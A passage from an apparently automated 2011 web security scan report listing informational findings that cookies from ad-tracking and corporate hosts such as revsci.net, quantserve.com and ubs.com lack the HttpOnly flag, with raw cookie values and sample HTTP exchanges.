rsi_segs_1000000=pUPF4jlBeHIMH/C1v6FY5PjO22rQpqLIRj7lzGDK0pZ5a28Qjg614UTo+UUZb5s27MU3p+k1fyDJMFC8UMYTHbX5oy7V/9AyP3MKtaUdhNOZLiDzifUwJ6G017VVI1pv3eQy/8vqbtJkyjk7nE4KE7l/wLZt8DhbakiEW/VLtFEXckivfAVqRuzLjZec6jzqKaqKrjFKfHSYNLNHdNVX11b+xXjbYwlDNyJv0Fhoh3zSBDAaKUDjNkPyWg082tNhETKy7tEFVMoqZ4uQwGoPaO/utnIBrsOkDHbwJWsvQGaGUzBhsCsTUS3GspLlv9PXwnuiXdyyzDdBLkO0mpRqHFg8ZjtJA1IYrzt9napRSvbPxXmagthUik25xORIWYKMM7HWh842q0BgXmYHsemlc/aTVfxqrc4qPByTJ1/04AbqT1ntuJN8Y2uTzuJL7+yhOY5PR6c6iO+wh5akL8lEX9k83bGIOi1VbGjYD104xeGlS2VbjzTa9xmTTzPgR4WxHTJ7rSM8NBbzW1HUX2RVATZ0oTIKIxS+0QrtvdM65TwP8es2F6hzh/35CSJ6tH8UW+bnd52pUZcMb0ML4RJKJeoi4STpyI+wRAv4qTNgQqrlgpxeLO6jE3LM1jGedmZzMbpa44eSz2wwCvt/eg8hvBNb0m9iWVuG7zkS6R6mjJHs5aC0GQaVlR3x7MrPAjqaWMiNPYdtPtZsbjVEz8ALgUQRikbtowMS6xzKwPAZe46dB7pUA25X2IyUW/OMLa+vBIGcp73PBb7SrYs=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k9BuXIMH/AtZKgq+tBdHBVM7RYjwSPPC3FVLQFwFuMWG8EbAQsYoI8OaV7WOPjhx2CPcf9OpsZ48ffhgxUKwuHNdaG23oxgOxz4a2BAp5KnJ3kxYWukGTD9NHDu8HXg48nFrD79wjk7auuMDaF0MDEpTr5tMmmNUq38rgsEW4ayA8sCri2difrlqs/ene9+0qYeAfsmIqFs+0h9eFw838xg8/lCR7F0cH8rBUq6YU/9uihuCUcdFDV0an6kUaJ3sBvD3Tkfvy3EISMZa1zqUadhdbND+xUJZWqZWdDr+HWh2QBujcRipZlNYvBhOgEDd3F3DGEKvxZpcwjaLytiu147VLpmewyyiidQoXqce5lKaJk9S7G0XA2JVhoBTiP98/BwqSgIAxs3Z0Zi8eNprpTgeQ+w6Kn7LwNms9soA9Dpsu9og1qQJHB4aseZew+aew5y/ZNYSeIi9cIoxIcsNpQztLdBXXmvC925sWanqfyt8IXbY+LsTOEuFvoxYXAOrMbmM0uFHlGV5PS3E2KKr3EzPWWlX7+RPpv7E7R7U/TEbe0NpiODIG/uPEhR8i9pAEQMKLzhnNI654bV3jfWPCG43Y3UD9Zx10dgLTz3jCnBdPlX/DnObvK3St53/AcO5JCK4ne1hUKbVROkiYw1rfHnvjCM1/MNSlt0upkZwyZlOTkZ69diDWW+QyGqCV3/WgLueQXvOx1RQft/4PPBhoKMH0stGdjEWSwWevbrP9hM2WQ1vCvztSZZTB6+LNnXp3BZhTHV; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
rtc_N0S3=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.56. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.58. http://profile.live.com/badge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.59. http://promote.orkut.com/preview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://promote.orkut.com
Path:	/preview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=5d2db29b869c8b64:TM=1309951271:LM=1309951271:S=xyDavJj_t78LgYQs; expires=Fri, 05-Jul-2013 11:21:11 GMT; path=/; domain=promote.orkut.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preview HTTP/1.1
Host: promote.orkut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5d2db29b869c8b64:TM=1309951271:LM=1309951271:S=xyDavJj_t78LgYQs; expires=Fri, 05-Jul-2013 11:21:11 GMT; path=/; domain=promote.orkut.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:11 GMT
Server: orkut_broadcast
Content-Length: 11782
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 400 (Bad Request)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;colo
...[SNIP]...

10.60. https://quotes-public.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public.ubs.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/ HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:25 GMT
Server: Apache
Set-Cookie: Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-; Path=/; Secure; Version=1
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache="set-cookie, set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close

10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/de

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/en

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/lang/it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public1.ubs.com
Path:	/app/CGT/Workbench/wb/pageGroup/wb_pg_mi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Navajo=TXSpnkWPb7ORQn1naHpHOSB0Kvh2w+94kwSVaivyLBZxXXRnyRqWyvT03z0vyA91oGgM4nXDSkc-; Path=/; Secure; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/pageGroup/wb_pg_mi HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:54 GMT
Server: Apache
Set-Cookie: Navajo=TXSpnkWPb7ORQn1naHpHOSB0Kvh2w+94kwSVaivyLBZxXXRnyRqWyvT03z0vyA91oGgM4nXDSkc-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

10.68. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAt